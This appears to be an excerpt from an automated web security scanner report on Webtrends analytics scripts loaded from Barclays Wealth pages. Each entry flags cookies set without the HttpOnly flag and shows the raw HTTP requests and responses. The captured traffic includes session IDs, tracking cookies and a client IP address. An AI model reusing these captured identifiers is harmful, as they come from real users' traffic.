df1c3bc4ada51036f24394cbe5d410ce664ca7a4dd9b8926f8d1267a3b4cd6d23b66d608fd61542275652f6c0b590e1a753c67069b48a7fc89012408726216ab142b610b6dc6f805705ccfacea01849a7dce8a19afabed01488c282b19a2582e52f65c5fc189b17e6491c6a2bda98cbf11a67a4e85f4338cae012d02f6b518ace0acd71b6e37a2a1c450940c12a160d7854f110eb1ef6dda0e97a86ce381daa5d65b51fede81f33dd6e98dd3fd8c176602dd4452 HTTP/1.1
Host: ots.optimize.webtrends.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.barclayswealth.com/international/barclays-bank-account.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=4B58DD7DB5603E2D9048FE4EA69A8782; WT_FPC_A=id=50.23.123.106-4086325760.30173190:lv=1314883489615:ss=1314882906914; company_history=%5B%5B%22http%3A//forums.webtrends.com/webtrends%22%2C%22Webtrends%22%5D%5D; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1314912397811:ss=1314912369532; _wt.control-79569-ta_11ApplyNowStep2ABn=f4be6fb10e561e19b362e17be8e54985a21e7d8c08da7565c9f725264895b2de21195dd232f468eb32a502163635a3366bc906e51ea492f77d4072456b73d3258873d1d51fd5a6e43f8c56ecc851bb0bfa65887ddf50cc1df578ccf8210063e053; _wt.mode-79569=e1f36dbd085f00297bec; _wt.user-79569=f4be7ca51b412f05a651eb2dbab301d2f00b6ac844996860b4fc36540ed3ea93585406a332f46bad3495034e7521af202c964aa44df684e366163b146b7fc473f5238d9659c4a8f56ec815eadf54fa4cb174c323df59d81ff973c1eb6561869c5e943c192948097db1fe1fc2002e7571

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:02:16 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: _wt.control-79569-ta_11ApplyNowStep2ABn=e991c52eef3b746311a996e09a3d5f50606c466e8252e8c35a352f883792295c08711c8cc9f058f2621e33c799e3734cddf5e2e7af3f58ba292e6f763a8c6def471920c89142c67297c67c94121355d8b0023d832645ba3e5e83c11e2d05e2ee14; Expires=Sun, 01-Jan-2012 00:02:16 GMT; Path=/
Set-Cookie: _wt.conversion-79569-ta_11ApplyNowStep2ABn=052836ce; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: _wt.mode-79569=fcdcc722e93202f2ddfb; Path=/
Via: 1.1 ots.optimize.webtrends.com
p3p: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Vary: Accept-Encoding, User-Agent
Content-Length: 1873
Connection: Keep-Alive


/**
* Copyright 2005-2009 webtrends All Rights Reserved.
* WEBTRENDS PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
*
* $Id: js.jsp,v 3.0 2009-11-24 23:15:52 michae
...[SNIP]...
14.175. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa339b1db20f00a0c76c95e5b8c9ab179a9a7059773289f5d4594b55d3c9641c30a2cdd9b75a2643b61a5180eb55ca54c628392ac6b5b94dc1a230efca05cd1e5130aadc55428fd2be53b4a1ab7731f3680e19392dc0819f545f021534118f9f569ee81c351728f187795199770be34ebb53a2327b7fc746c20d964cfb4dfea0125ff139c3341beb23256558186065fa27eb351111e216b5d5bff304beb5361fa5b633f740e2ff4310189b88f0fdcc9947eb1364958744c1ee6b3c266973a8b35acfce01dcb675b695eedaac681d63f95872d95f574bf0a61b1cac09091a54fe2309e228076de461477d5f56e048992f975ba7ffb5f67b18a4a7c9d59a1fd30cf372bb0106e48f5117537ab15b1f16d38380999a1a0086c5a868a37413e24d4ed6ecd60f8b90128337441ecd46b9d01e78c2c8f9df5487f2e307677b4db3f33f947fb24b11a8261a57f7b12d8cb9adb1e535921aaa642aa50f12fa52522ae6f3b52a486dfd1ec7765f935ab3b41aa84f8df46f6b87de6ac55335e82496e147a946d1539c6e5e8e0b30c319ab3c8a0f61b1b236c14ac017d9627f463905cfaad2e9d53966c1ecb989de9efddfb3b1123b4ee4d7cbc3880c040fc45d3742c7738d1e567e67dc458d0bedf6a5e043dc7e4a48a52b25432a2b9a310b3f2627e5ef71719766274a6742423855c4931d9b98a5b87abe04298873bd3c40457c68eae7bf35095e1714b92b84e3c2ad178818519cdc2316ac1392490ef873ffc707cca523fc8ee36f5f1e67e925f4aa1d283d0325c8c56a1e47d43f99a0f43ea796f7f40dd833a7465472502ad891110f0a0151bee2471c0f84b58b450312e9e5b5418004b619188fc1edcde2625c7a13b64fc22f042a3efb50b37b9d86fa9d0c3e30a60e9948d4d0b9eac6733d563d5df7ca0498175aa0fbd95cbbc4f628df8aae8f2a1e0eaa52782526486f0a61b77ea67db20c8d4845316d9d20cf71409509428d35685d52a1423fc302171bcb84cf4ff74fd6f246e8f5d791a92f2fe93dfe938773c64272009faa7d68ca7c0f49bb1f1a2fdef143a8adb3ae4dc4036f0c8317049b7a9083abcdaec6716fe0ee4f4ec8c173d4ac1cc72ea3890a39322a4be87dc7aaf6d620bd7b6d3946133b941e1b131dd299c0ef3c312880c81557dc6e15b28b807c3561817a7f1ca2f88092f64122968672c187d7263f2a0087b709b249d079c5ad49f1a54f931cf9f5c0a5d650a537fcc0c2d98543a9dd14af7cab4197893c6db543ee8518d347ab6ef1bf4be4b56110d9e87c10b4724acdabd52da707d75ebd702e6eefe3588f781210a63dc34ff9fd94e78bb948ca584777a13e7fa26fc5f01741322c2c8f4939c2afa54d36a5129d9cb2de40cd6058eab5b9fdb0549ef065242a118bc52777bd32bf200b7236393f6d170b061d706533019c1bf2e48006700c716d1ea51f7f7e0e6895f8562a51c0a7ba1a879a749d8616a3aab60307856c320d98646317ae5b1c9fcdb56433c6dcf0efb68ab843a27d44d8aa3e83e8153e3bcff95bf2e0bf885b6920b8b2a339d81b4abe7bd9941d0e06b0e76ed70797a730b79e8deed61347b883d2b22ac3a1c79f00f9213c  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ots.optimize.webtrends.com
Path:   /ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa339b1db20f00a0c76c95e5b8c9ab179a9a7059773289f5d4594b55d3c9641c30a2cdd9b75a2643b61a5180eb55ca54c628392ac6b5b94dc1a230efca05cd1e5130aadc55428fd2be53b4a1ab7731f3680e19392dc0819f545f021534118f9f569ee81c351728f187795199770be34ebb53a2327b7fc746c20d964cfb4dfea0125ff139c3341beb23256558186065fa27eb351111e216b5d5bff304beb5361fa5b633f740e2ff4310189b88f0fdcc9947eb1364958744c1ee6b3c266973a8b35acfce01dcb675b695eedaac681d63f95872d95f574bf0a61b1cac09091a54fe2309e228076de461477d5f56e048992f975ba7ffb5f67b18a4a7c9d59a1fd30cf372bb0106e48f5117537ab15b1f16d38380999a1a0086c5a868a37413e24d4ed6ecd60f8b90128337441ecd46b9d01e78c2c8f9df5487f2e307677b4db3f33f947fb24b11a8261a57f7b12d8cb9adb1e535921aaa642aa50f12fa52522ae6f3b52a486dfd1ec7765f935ab3b41aa84f8df46f6b87de6ac55335e82496e147a946d1539c6e5e8e0b30c319ab3c8a0f61b1b236c14ac017d9627f463905cfaad2e9d53966c1ecb989de9efddfb3b1123b4ee4d7cbc3880c040fc45d3742c7738d1e567e67dc458d0bedf6a5e043dc7e4a48a52b25432a2b9a310b3f2627e5ef71719766274a6742423855c4931d9b98a5b87abe04298873bd3c40457c68eae7bf35095e1714b92b84e3c2ad178818519cdc2316ac1392490ef873ffc707cca523fc8ee36f5f1e67e925f4aa1d283d0325c8c56a1e47d43f99a0f43ea796f7f40dd833a7465472502ad891110f0a0151bee2471c0f84b58b450312e9e5b5418004b619188fc1edcde2625c7a13b64fc22f042a3efb50b37b9d86fa9d0c3e30a60e9948d4d0b9eac6733d563d5df7ca0498175aa0fbd95cbbc4f628df8aae8f2a1e0eaa52782526486f0a61b77ea67db20c8d4845316d9d20cf71409509428d35685d52a1423fc302171bcb84cf4ff74fd6f246e8f5d791a92f2fe93dfe938773c64272009faa7d68ca7c0f49bb1f1a2fdef143a8adb3ae4dc4036f0c8317049b7a9083abcdaec6716fe0ee4f4ec8c173d4ac1cc72ea3890a39322a4be87dc7aaf6d620bd7b6d3946133b941e1b131dd299c0ef3c312880c81557dc6e15b28b807c3561817a7f1ca2f88092f64122968672c187d7263f2a0087b709b249d079c5ad49f1a54f931cf9f5c0a5d650a537fcc0c2d98543a9dd14af7cab4197893c6db543ee8518d347ab6ef1bf4be4b56110d9e87c10b4724acdabd52da707d75ebd702e6eefe3588f781210a63dc34ff9fd94e78bb948ca584777a13e7fa26fc5f01741322c2c8f4939c2afa54d36a5129d9cb2de40cd6058eab5b9fdb0549ef065242a118bc52777bd32bf200b7236393f6d170b061d706533019c1bf2e48006700c716d1ea51f7f7e0e6895f8562a51c0a7ba1a879a749d8616a3aab60307856c320d98646317ae5b1c9fcdb56433c6dcf0efb68ab843a27d44d8aa3e83e8153e3bcff95bf2e0bf885b6920b8b2a339d81b4abe7bd9941d0e06b0e76ed70797a730b79e8deed61347b883d2b22ac3a1c79f00f9213c

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa339b1db20f00a0c76c95e5b8c9ab179a9a7059773289f5d4594b55d3c9641c30a2cdd9b75a2643b61a5180eb55ca54c628392ac6b5b94dc1a230efca05cd1e5130aadc55428fd2be53b4a1ab7731f3680e19392dc0819f545f021534118f9f569ee81c351728f187795199770be34ebb53a2327b7fc746c20d964cfb4dfea0125ff139c3341beb23256558186065fa27eb351111e216b5d5bff304beb5361fa5b633f740e2ff4310189b88f0fdcc9947eb1364958744c1ee6b3c266973a8b35acfce01dcb675b695eedaac681d63f95872d95f574bf0a61b1cac09091a54fe2309e228076de461477d5f56e048992f975ba7ffb5f67b18a4a7c9d59a1fd30cf372bb0106e48f5117537ab15b1f16d38380999a1a0086c5a868a37413e24d4ed6ecd60f8b90128337441ecd46b9d01e78c2c8f9df5487f2e307677b4db3f33f947fb24b11a8261a57f7b12d8cb9adb1e535921aaa642aa50f12fa52522ae6f3b52a486dfd1ec7765f935ab3b41aa84f8df46f6b87de6ac55335e82496e147a946d1539c6e5e8e0b30c319ab3c8a0f61b1b236c14ac017d9627f463905cfaad2e9d53966c1ecb989de9efddfb3b1123b4ee4d7cbc3880c040fc45d3742c7738d1e567e67dc458d0bedf6a5e043dc7e4a48a52b25432a2b9a310b3f2627e5ef71719766274a6742423855c4931d9b98a5b87abe04298873bd3c40457c68eae7bf35095e1714b92b84e3c2ad178818519cdc2316ac1392490ef873ffc707cca523fc8ee36f5f1e67e925f4aa1d283d0325c8c56a1e47d43f99a0f43ea796f7f40dd833a7465472502ad891110f0a0151bee2471c0f84b58b450312e9e5b5418004b619188fc1edcde2625c7a13b64fc22f042a3efb50b37b9d86fa9d0c3e30a60e9948d4d0b9eac6733d563d5df7ca0498175aa0fbd95cbbc4f628df8aae8f2a1e0eaa52782526486f0a61b77ea67db20c8d4845316d9d20cf71409509428d35685d52a1423fc302171bcb84cf4ff74fd6f246e8f5d791a92f2fe93dfe938773c64272009faa7d68ca7c0f49bb1f1a2fdef143a8adb3ae4dc4036f0c8317049b7a9083abcdaec6716fe0ee4f4ec8c173d4ac1cc72ea3890a39322a4be87dc7aaf6d620bd7b6d3946133b941e1b131dd299c0ef3c312880c81557dc6e15b28b807c3561817a7f1ca2f88092f64122968672c187d7263f2a0087b709b249d079c5ad49f1a54f931cf9f5c0a5d650a537fcc0c2d98543a9dd14af7cab4197893c6db543ee8518d347ab6ef1bf4be4b56110d9e87c10b4724acdabd52da707d75ebd702e6eefe3588f781210a63dc34ff9fd94e78bb948ca584777a13e7fa26fc5f01741322c2c8f4939c2afa54d36a5129d9cb2de40cd6058eab5b9fdb0549ef065242a118bc52777bd32bf200b7236393f6d170b061d706533019c1bf2e48006700c716d1ea51f7f7e0e6895f8562a51c0a7ba1a879a749d8616a3aab60307856c320d98646317ae5b1c9fcdb56433c6dcf0efb68ab843a27d44d8aa3e83e8153e3bcff95bf2e0bf885b6920b8b2a339d81b4abe7bd9941d0e06b0e76ed70797a730b79e8deed61347b883d2b22ac3a1c79f00f9213c HTTP/1.1
Host: ots.optimize.webtrends.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.barclayswealth.com/international/i-alert.htm?WT.mc_id=int_q3_ialert_bwi&WT.mc_ev=click
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=6470427122C0BC6EEE06A97043357700; WT_FPC_A=id=50.23.123.106-4086325760.30173190:lv=1314883489615:ss=1314882906914; company_history=%5B%5B%22http%3A//forums.webtrends.com/webtrends%22%2C%22Webtrends%22%5D%5D; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1314912397811:ss=1314912369532; _wt.user-79569=e991d63afa2c457f049a9cb6c86b17073279512ace11f5c6273e3cfa71d47111713c47fdc9f05bb4642e329fdaf77f5a9aaaaea6fc6d4eae327826273a807ab93a497c8bd753c863c6823f920516149ffb1376dd264cae3c5288cc0d6999f494b8f4fe589a3de9ed764acb9a031a36ee; _wt.control-79569-ta_11ApplyNowStep2ABn=e991c52eef3b746311a996e09a3d5f50606c466e8252e8c35a352f883792295c08711c8cc9f058f2621e33c799e3734cddf5e2e7af3f58ba292e6f763a8c6def471920c89142c67297c67c94121355d8b0023d832645ba3e5e83c11e2d02420171; _wt.mode-79569=fcdcc722e93200db2e76

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:31:32 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: _wt.mode-79569=fcdcc722e9320578927c; Path=/
Set-Cookie: _wt.user-79569=e991d63afa2c457f049a9cb6c86b17073279512ace11f5c6273e3cfa71d47111713c47fdc9f05bb4642e329fdaf77f5a9aaaaea6fc6d4eae327826273a807ab93a497c8bd753c863c6823f920516149ffb1376dd264cae3c5288cc0d6999f494b8f4fe589a3de9ed764acb9a05d2312f; Expires=Sun, 01-Jan-2012 00:31:32 GMT; Path=/
Via: 1.1 ots.optimize.webtrends.com
p3p: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Vary: Accept-Encoding, User-Agent
Content-Length: 44561


/**
* Copyright 2005-2009 webtrends All Rights Reserved.
* WEBTRENDS PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
*
* $Id: js.jsp,v 3.0 2009-11-24 23:15:52 michae
...[SNIP]...
14.176. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa339b1db20f00a0c76c95e5b8c9ab179a9a7059773289f5d4594b55d3c9641c30a2cdd9b75a2643b61a5180eb55ca54c628392ac6b5b94dc1a230efca05cd1e5130aadc55428fd2be53b4a1ab7731f3680e19392de0828a56481f5b29398c944586ea2b69577da9d14849ca3810ba1be51a94485c3b8d0df1139a67ca57bdad2954a81df26e54b2515e10536c19069a4897652328a51ea4f9befe56dba76741e6d873e633a9c1581835bbbeffefeadd0dba214499d00aacba2b2e2c7b20f4f61bd3986191a223c0d8e58ce23a4f38a25f3f815e425df5eb151ca719121e4ce12004ad271c68e56b4664154de05d88349654b2faf5fa7b06e8a285cd8557c319b371e20d5ad0b40a14440bb04b4f5dc0dbfd8bc62a028eccbe38ed5053c56037d2ecb936ad8922b955414ac716ea905366cd9eafd20cc3a6a141382d0d868350ea1bc32e35d8473431a7b1788ba3f5a3f22ae101e47545dd791fef2c553da4a6ea6d0830c36fa15a39f127d6d40bcd1edca75d20c8a340f8602cc7079cfc5dee0e8412c90521ea705ba06acc46886427f6e66c9819af4f8f3a2d6a200cd28095a794607dcff6fbce9fcce9c7bfdf517a53a48a9e81950b1f16d0177c1e9750d153047273d5069f18aaf0b3f956e5390a5fb1612353317f9b325f37332df0b97a7f9f37204b6747463b07969349cb9aa6b27eb4042ddf27b46e16437a69ece3bc31535f1140bc2bd8b4c3fe40891a559fdd2316fd4c951a5efa70ff90039cab73ae8cb63d584c62b375a0ab1a2b6c0623cd986b1a4c856899fef33ea0c1affe0d8d6bf1400d26527edbc646525d5701baed4d1d5f8fb088110a14efb0ee1ed507b31318da9deb9be3630c784eb31f942b04206efe59e57d918ef5ca0c3e62a254ce4f8583e8b6cd243a513901a1cd069c1b03a0fad059bdc8f924888ea6826a0a4ac96042564e322c0327bb23e135a765e65c523e35de2ade710f970e16d92f714c3ee1053f915e48588cd29a5af840cdf54cf4b683f7a12656af63a3d9f82b84283f5dd7ae121b8672173481535773dfe64beff9fbab01c207770e811752977a9fdea3c2edd93705d9ae0b159bd52ac2ab088e34cee34d2867335ae73ec5b1f58329b27d63394c19348f4c051a0496dcceb42c2033cada7f18ce7240efd4913d696e9b747f4ca7f69ed2f47a77c1f267838e9909366e35c6ea1be13aab2582a10da3aa45c347aff1c1a5d657f031f1c4c18b8c1ba1d010a97aa5129dda6a3db710e1811f8242ae6da1e341b3b7341a89bf7142b5714c9ef18c2df50b8054b7267c6fb2e60d8e291e41f535924eeee9d08acaff57c2041071bb307ff26acbe11900302b2ed94f3c95aaa11236f117959ab1de1cc8334ca0a0d89a8e2aad85237b6e4cd8d63267d20ef26d572726602b6b0b03004f776a650b9b1df3fb8200745f7c3617ad157a34076896f957260a99ace901d39176c9821effa0ea05188d7b2d4da65a344fe16649d1c1e9256695dff6e6ad8db250af6a1b82f665d6fd0b2e01a9bf1dafb3fbd71c3c36a4b2811bd001f598b3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ots.optimize.webtrends.com
Path:   /ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa339b1db20f00a0c76c95e5b8c9ab179a9a7059773289f5d4594b55d3c9641c30a2cdd9b75a2643b61a5180eb55ca54c628392ac6b5b94dc1a230efca05cd1e5130aadc55428fd2be53b4a1ab7731f3680e19392de0828a56481f5b29398c944586ea2b69577da9d14849ca3810ba1be51a94485c3b8d0df1139a67ca57bdad2954a81df26e54b2515e10536c19069a4897652328a51ea4f9befe56dba76741e6d873e633a9c1581835bbbeffefeadd0dba214499d00aacba2b2e2c7b20f4f61bd3986191a223c0d8e58ce23a4f38a25f3f815e425df5eb151ca719121e4ce12004ad271c68e56b4664154de05d88349654b2faf5fa7b06e8a285cd8557c319b371e20d5ad0b40a14440bb04b4f5dc0dbfd8bc62a028eccbe38ed5053c56037d2ecb936ad8922b955414ac716ea905366cd9eafd20cc3a6a141382d0d868350ea1bc32e35d8473431a7b1788ba3f5a3f22ae101e47545dd791fef2c553da4a6ea6d0830c36fa15a39f127d6d40bcd1edca75d20c8a340f8602cc7079cfc5dee0e8412c90521ea705ba06acc46886427f6e66c9819af4f8f3a2d6a200cd28095a794607dcff6fbce9fcce9c7bfdf517a53a48a9e81950b1f16d0177c1e9750d153047273d5069f18aaf0b3f956e5390a5fb1612353317f9b325f37332df0b97a7f9f37204b6747463b07969349cb9aa6b27eb4042ddf27b46e16437a69ece3bc31535f1140bc2bd8b4c3fe40891a559fdd2316fd4c951a5efa70ff90039cab73ae8cb63d584c62b375a0ab1a2b6c0623cd986b1a4c856899fef33ea0c1affe0d8d6bf1400d26527edbc646525d5701baed4d1d5f8fb088110a14efb0ee1ed507b31318da9deb9be3630c784eb31f942b04206efe59e57d918ef5ca0c3e62a254ce4f8583e8b6cd243a513901a1cd069c1b03a0fad059bdc8f924888ea6826a0a4ac96042564e322c0327bb23e135a765e65c523e35de2ade710f970e16d92f714c3ee1053f915e48588cd29a5af840cdf54cf4b683f7a12656af63a3d9f82b84283f5dd7ae121b8672173481535773dfe64beff9fbab01c207770e811752977a9fdea3c2edd93705d9ae0b159bd52ac2ab088e34cee34d2867335ae73ec5b1f58329b27d63394c19348f4c051a0496dcceb42c2033cada7f18ce7240efd4913d696e9b747f4ca7f69ed2f47a77c1f267838e9909366e35c6ea1be13aab2582a10da3aa45c347aff1c1a5d657f031f1c4c18b8c1ba1d010a97aa5129dda6a3db710e1811f8242ae6da1e341b3b7341a89bf7142b5714c9ef18c2df50b8054b7267c6fb2e60d8e291e41f535924eeee9d08acaff57c2041071bb307ff26acbe11900302b2ed94f3c95aaa11236f117959ab1de1cc8334ca0a0d89a8e2aad85237b6e4cd8d63267d20ef26d572726602b6b0b03004f776a650b9b1df3fb8200745f7c3617ad157a34076896f957260a99ace901d39176c9821effa0ea05188d7b2d4da65a344fe16649d1c1e9256695dff6e6ad8db250af6a1b82f665d6fd0b2e01a9bf1dafb3fbd71c3c36a4b2811bd001f598b3

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa339b1db20f00a0c76c95e5b8c9ab179a9a7059773289f5d4594b55d3c9641c30a2cdd9b75a2643b61a5180eb55ca54c628392ac6b5b94dc1a230efca05cd1e5130aadc55428fd2be53b4a1ab7731f3680e19392de0828a56481f5b29398c944586ea2b69577da9d14849ca3810ba1be51a94485c3b8d0df1139a67ca57bdad2954a81df26e54b2515e10536c19069a4897652328a51ea4f9befe56dba76741e6d873e633a9c1581835bbbeffefeadd0dba214499d00aacba2b2e2c7b20f4f61bd3986191a223c0d8e58ce23a4f38a25f3f815e425df5eb151ca719121e4ce12004ad271c68e56b4664154de05d88349654b2faf5fa7b06e8a285cd8557c319b371e20d5ad0b40a14440bb04b4f5dc0dbfd8bc62a028eccbe38ed5053c56037d2ecb936ad8922b955414ac716ea905366cd9eafd20cc3a6a141382d0d868350ea1bc32e35d8473431a7b1788ba3f5a3f22ae101e47545dd791fef2c553da4a6ea6d0830c36fa15a39f127d6d40bcd1edca75d20c8a340f8602cc7079cfc5dee0e8412c90521ea705ba06acc46886427f6e66c9819af4f8f3a2d6a200cd28095a794607dcff6fbce9fcce9c7bfdf517a53a48a9e81950b1f16d0177c1e9750d153047273d5069f18aaf0b3f956e5390a5fb1612353317f9b325f37332df0b97a7f9f37204b6747463b07969349cb9aa6b27eb4042ddf27b46e16437a69ece3bc31535f1140bc2bd8b4c3fe40891a559fdd2316fd4c951a5efa70ff90039cab73ae8cb63d584c62b375a0ab1a2b6c0623cd986b1a4c856899fef33ea0c1affe0d8d6bf1400d26527edbc646525d5701baed4d1d5f8fb088110a14efb0ee1ed507b31318da9deb9be3630c784eb31f942b04206efe59e57d918ef5ca0c3e62a254ce4f8583e8b6cd243a513901a1cd069c1b03a0fad059bdc8f924888ea6826a0a4ac96042564e322c0327bb23e135a765e65c523e35de2ade710f970e16d92f714c3ee1053f915e48588cd29a5af840cdf54cf4b683f7a12656af63a3d9f82b84283f5dd7ae121b8672173481535773dfe64beff9fbab01c207770e811752977a9fdea3c2edd93705d9ae0b159bd52ac2ab088e34cee34d2867335ae73ec5b1f58329b27d63394c19348f4c051a0496dcceb42c2033cada7f18ce7240efd4913d696e9b747f4ca7f69ed2f47a77c1f267838e9909366e35c6ea1be13aab2582a10da3aa45c347aff1c1a5d657f031f1c4c18b8c1ba1d010a97aa5129dda6a3db710e1811f8242ae6da1e341b3b7341a89bf7142b5714c9ef18c2df50b8054b7267c6fb2e60d8e291e41f535924eeee9d08acaff57c2041071bb307ff26acbe11900302b2ed94f3c95aaa11236f117959ab1de1cc8334ca0a0d89a8e2aad85237b6e4cd8d63267d20ef26d572726602b6b0b03004f776a650b9b1df3fb8200745f7c3617ad157a34076896f957260a99ace901d39176c9821effa0ea05188d7b2d4da65a344fe16649d1c1e9256695dff6e6ad8db250af6a1b82f665d6fd0b2e01a9bf1dafb3fbd71c3c36a4b2811bd001f598b3 HTTP/1.1
Host: ots.optimize.webtrends.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.barclayswealth.com/international/barclays-bank-account.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=4B58DD7DB5603E2D9048FE4EA69A8782; WT_FPC_A=id=50.23.123.106-4086325760.30173190:lv=1314883489615:ss=1314882906914; company_history=%5B%5B%22http%3A//forums.webtrends.com/webtrends%22%2C%22Webtrends%22%5D%5D; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1314912397811:ss=1314912369532; _wt.user-79569=f4be7ca51b412f05a651eb2dbab301d2f00b6ac844996860b4fc36540ed3ea93585406a332f46bad3495034e7521af202c964aa44df684e366163b146b7fc473f5238d9659c4a8f56ec815eadf54fa4cb174c323df59d81ff973c1eb6561869c5e943c192948097db1fe1fc200599559; _wt.control-79569-ta_11ApplyNowStep2ABn=f4be6fb10e561e19b362e17be8e54985a21e7d8c08da7565c9f725264895b2de21195dd232f468eb32a502163635a3366bc906e51ea492f77d4072456b73d3258873d1d51fd5a6e43f8c56ecc851bb0bfa65887ddf50cc1df578ccf8210063e053; _wt.mode-79569=fcdcc722e9320537bb59

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:02:15 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: _wt.mode-79569=e1f36dbd085f00297bec; Path=/
Set-Cookie: _wt.user-79569=f4be7ca51b412f05a651eb2dbab301d2f00b6ac844996860b4fc36540ed3ea93585406a332f46bad3495034e7521af202c964aa44df684e366163b146b7fc473f5238d9659c4a8f56ec815eadf54fa4cb174c323df59d81ff973c1eb6561869c5e943c192948097db1fe1fc2002e7571; Expires=Sun, 01-Jan-2012 00:02:16 GMT; Path=/
Via: 1.1 ots.optimize.webtrends.com
p3p: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Vary: Accept-Encoding, User-Agent
Content-Length: 44561


/**
* Copyright 2005-2009 webtrends All Rights Reserved.
* WEBTRENDS PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
*
* $Id: js.jsp,v 3.0 2009-11-24 23:15:52 michae
...[SNIP]...
